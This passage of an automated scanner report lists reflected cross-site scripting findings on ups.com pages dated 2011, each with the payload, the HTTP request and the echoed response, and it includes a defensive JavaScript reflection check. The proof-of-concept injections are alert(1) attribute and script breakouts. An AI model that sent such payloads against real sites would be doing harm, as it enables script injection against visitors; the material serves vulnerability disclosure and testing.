Set-Cookie: com.ups.bussol.data=DWTzNYGQHR1jTpLtNvBGDZLcL5q5CvJp349WjJvcM9Y1g2VCjvJ0!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18024


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav&loc=en_USc4508"style="x:expression(alert(1))"db0ed3f5143" />
...[SNIP]...

1.292. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f65"><script>alert(1)</script>5b1105e1d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?50f65"><script>alert(1)</script>5b1105e1d12=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=p12cNYGQVCmgTrnxV82pBjBNpyBnQNMFsg2WXBQNQ5kNp7dN0vmk!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&50f65"><script>alert(1)</script>5b1105e1d12=1" />
...[SNIP]...
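
Finding 1.292 completes the set of payload shapes the crawler uses against this host: an attribute breakout followed by an IE CSS expression, a string-literal breakout inside a script block, and an attribute breakout followed by a literal script tag. What the crawler actually checks is whether the text between its random prefix and suffix comes back byte for byte, in a context where the payload's first character matters. The following is an added example, not the crawler's code and not code from the scanned site: a minimal version of that check, usable as a regression test against a saved response body once the encoding is fixed. The two bodies are constructed from the snippets shown in 1.289, 1.292 and the contentID attribute finding immediately above 1.289; the second is a hand-encoded version of the first.

```javascript
// Added example: not code from the scanner report or from the scanned site.
// A scanner-style reflection check: each probe is a random prefix, a breakout
// payload and a random suffix, so the echoed copy can be located exactly and
// compared byte for byte with what was sent. Both response bodies below are
// constructed from the report's snippets, not fetched from ups.com.

// Probes taken from the report: the scanner's prefix/suffix pairs around the
// URL-decoded payload (the request sent %3b, the page echoed ';').
const PROBES = [
  { prefix: "b611e", payload: '"style="x:expression(alert(1))"', suffix: "ed7c494a92e" },
  { prefix: "400cb", payload: '";alert(1)//', suffix: "b2edff9e689" },
  { prefix: "50f65", payload: '"><script>alert(1)</script>', suffix: "5b1105e1d12" },
];

// The one character that must survive unencoded for the payload to matter in
// each context: a double quote to leave a quoted attribute or string literal,
// an angle bracket to open a tag in text.
const BREAKOUT = { attribute: '"', script: '"', text: "<" };

// Coarse context classification by looking backwards from the reflection:
// inside an open <script> block, inside an unclosed tag (an attribute), or
// ordinary text. A real scanner uses a proper HTML tokenizer here.
function contextAt(body, offset) {
  const before = body.slice(0, offset).toLowerCase();
  const scriptOpen = before.lastIndexOf("<script");
  const scriptClose = before.lastIndexOf("</script");
  if (scriptOpen > scriptClose) return "script";
  const tagOpen = before.lastIndexOf("<");
  const tagClose = before.lastIndexOf(">");
  if (tagOpen > tagClose) return "attribute";
  return "text";
}

// Every occurrence of prefix...suffix in the body, with what sits between.
function findReflections(body, prefix, suffix) {
  const found = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(prefix, from);
    if (start < 0) break;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end < 0) break;
    found.push({
      offset: start,
      echoed: body.slice(start + prefix.length, end),
      context: contextAt(body, start),
    });
    from = end + suffix.length;
  }
  return found;
}

// A reflection counts only if the copy is byte-identical to the payload and
// the context's breakout character is in it; an entity- or \u-encoded copy
// is the fix working, not a finding.
function isExploitable(reflection, payload) {
  return reflection.echoed === payload && payload.includes(BREAKOUT[reflection.context]);
}

function scan(body, probes = PROBES) {
  const hits = [];
  for (const p of probes) {
    for (const r of findReflections(body, p.prefix, p.suffix)) {
      hits.push({ probe: p.prefix, context: r.context, exploitable: isExploitable(r, p.payload) });
    }
  }
  return hits;
}

// Constructed body reproducing the three vulnerable snippets from the report.
const VULN_BODY = [
  '<input type="hidden" id="bspa_contentID"',
  '   value="ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e" />',
  '<script>',
  'embed(',
  '  "FlashVars", "contentID=ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689&loc=en_US"',
  ');',
  '</script>',
  '<input type="hidden" id="unKnown"',
  '   value="&50f65"><script>alert(1)</script>5b1105e1d12=1" />',
].join("\n");

// The same page after context-aware encoding: entities in the attributes,
// \uXXXX escapes in the string literal. The probes still reflect, but not verbatim.
const FIXED_BODY = [
  '<input type="hidden" id="bspa_contentID"',
  '   value="ct1_sol_sol_int_shipb611e&quot;style=&quot;x:expression(alert(1))&quot;ed7c494a92e" />',
  '<script>',
  'embed(',
  '  "FlashVars", "contentID=ct1_sol_sol_int_ship400cb\\u0022\\u003balert(1)\\u002f\\u002fb2edff9e689&loc=en_US"',
  ');',
  '</script>',
  '<input type="hidden" id="unKnown"',
  '   value="&50f65&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;5b1105e1d12=1" />',
].join("\n");

console.log("vulnerable:", scan(VULN_BODY));
console.log("fixed:     ", scan(FIXED_BODY));
```

Run as-is it reports three exploitable reflections for the vulnerable body and three non-exploitable ones for the fixed body: the probes still come back, because the application legitimately echoes its parameters, but as &quot; and \u0022 rather than a raw quote. The context classifier is deliberately coarse; a real scanner walks the response with an HTML tokenizer and also handles single-quoted and unquoted attributes, which this check does not cover.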

1.293. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4488"%3balert(1)//40eab8ba899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4488";alert(1)//40eab8ba899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?f4488"%3balert(1)//40eab8ba899=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hHRGNYGSG1qFq2p455VVvbKsh2Tl2HnHLFP4JjVGC8gGh3JzhfQS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&f4488";alert(1)//40eab8ba899=1&hash=1297646738736&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.294. http://www.ups.com/bussol [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 146aa"%3balert(1)//bd3493845d2 was submitted in the viewID parameter. This input was echoed as 146aa";alert(1)//bd3493845d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView146aa"%3balert(1)//bd3493845d2&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=rzNnNYGXg4SD00mpLyKTNYqkqnGB6nQpPPbbP0rsHMWZNB4nGR5N!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
tp://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646743669&loc=en_US&v=2.0.4&viewID=productView146aa";alert(1)//bd3493845d2"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.295. http://www.ups.com/bussol [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee was submitted in the viewID parameter. This input was echoed as 84d0b"style="x:expression(alert(1))"f75fdcc79ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /bussol?loc=en_US&viewID=productView84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=kfpyNYGVyJYcd5nzxs2wgPQkWb7XT8vVtlpnGtZn3Y1yHCd2cJCC!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="productView84d0b"style="x:expression(alert(1))"f75fdcc79ee" />
...[SNIP]...

1.296. http://www.ups.com/bussol/ [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef was submitted in the WT.svl parameter. This input was echoed as 38a59"style="x:expression(alert(1))"6e9610dfaef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hg8jNYGW0m7dsy3WYSgLQ7QfjtzHmgCvtyjGk22JY61HnP3QQr8J!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17929


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav38a59"style="x:expression(alert(1))"6e9610dfaef&loc=en_US" />
...[SNIP]...

1.297. http://www.ups.com/bussol/ [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ba38"%3balert(1)//d52a61ceed4 was submitted in the loc parameter. This input was echoed as 3ba38";alert(1)//d52a61ceed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?loc=en_US3ba38"%3balert(1)//d52a61ceed4&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=HBsWNYGQkl1y5dT46xdvnXNbdJG3FS5Y0hxDRT3g58MGvMpT1v2k!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736921&loc=en_US3ba38";alert(1)//d52a61ceed4&v=2.0.4&viewID=browseView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.298. http://www.ups.com/bussol/ [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313 was submitted in the loc parameter. This input was echoed as e2cb0"style="x:expression(alert(1))"1a12ccdf313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /bussol/?loc=en_USe2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=McY2NYGQB3Plb5QJJ76xlt1TsfghpCJGBL82fYy9TZl3kByrnsDK!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&viewID=browseView&WT.svl=PriNav&loc=en_USe2cb0"style="x:expression(alert(1))"1a12ccdf313" />
...[SNIP]...

1.299. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582f9"%3balert(1)//3f6cf9199d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 582f9";alert(1)//3f6cf9199d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?582f9"%3balert(1)//3f6cf9199d5=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Z2rlNYGQLcQDlzCSYkFCcdRy0gzf5r1LDs5gDDnbhBQvdfjtc5ln!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lor", "#869ca7",
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "582f9";alert(1)//3f6cf9199d5=1&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736688&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display =
...[SNIP]...

1.300. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f277"><script>alert(1)</script>5f1197d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?7f277"><script>alert(1)</script>5f1197d854b=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=LnCdNYGQnMQlkndzq12lTrZf1YJXy8q8Q4zYPKzFPPYvjywjk1vm!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&7f277"><script>alert(1)</script>5f1197d854b=1" />
...[SNIP]...

1.301. http://www.ups.com/bussol/ [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fa2"%3balert(1)//ebe16f7eeec was submitted in the viewID parameter. This input was echoed as 47fa2";alert(1)//ebe16f7eeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?loc=en_US&viewID=browseView47fa2"%3balert(1)//ebe16f7eeec&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=1skDNYGJnpQbW35Gyd5CQzr6JgDLTXLRbrDhGxGFhfhp4Y6QTVbS!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17966


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lication/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646740543&loc=en_US&v=2.0.4&viewID=browseView47fa2";alert(1)//ebe16f7eeec"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.302. http://www.ups.com/bussol/ [viewID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol/

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a was submitted in the viewID parameter. This input was echoed as 948b5"style="x:expression(alert(1))"6ccbe3a297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /bussol/?loc=en_US&viewID=browseView948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hWWhNYGTZF7r1mv0H5V2nHjKH8JjGycJTT32p2qb4NFT6r3f5BpS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18023


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
   value="browseView948b5"style="x:expression(alert(1))"6ccbe3a297a" />
...[SNIP]...

1.303. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/global/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1 was submitted in the REST URL parameter 2. This input was echoed as be80f"style="x:expression(alert(1))"dcbd75eabc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /content/globalbe80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/globalbe80f"style="x:expression(alert(1))"dcbd75eabc1/index.jsx">
...[SNIP]...

1.304. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a487"style%3d"x%3aexpression(alert(1))"0e616329edb was submitted in the REST URL parameter 2. This input was echoed as 3a487"style="x:expression(alert(1))"0e616329edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /content/us3a487"style%3d"x%3aexpression(alert(1))"0e616329edb/en/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
